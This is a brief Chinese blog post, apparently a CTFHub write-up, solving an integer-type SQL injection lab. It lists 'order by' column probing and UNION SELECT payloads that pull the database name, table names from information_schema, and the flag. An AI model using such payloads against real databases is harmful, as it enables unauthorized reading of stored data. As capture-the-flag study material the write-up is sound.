ctfhub整数型sql

尝试输入几个整数

然后判断字段数

1 order by 1
1 order by 2

-1 union select 1,database()(查库名)

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=’sqli’(查表名)

-1 union select 1,group_concat(flag) from sqli.flag(细查flag)

发表评论

蜀ICP备2022010829号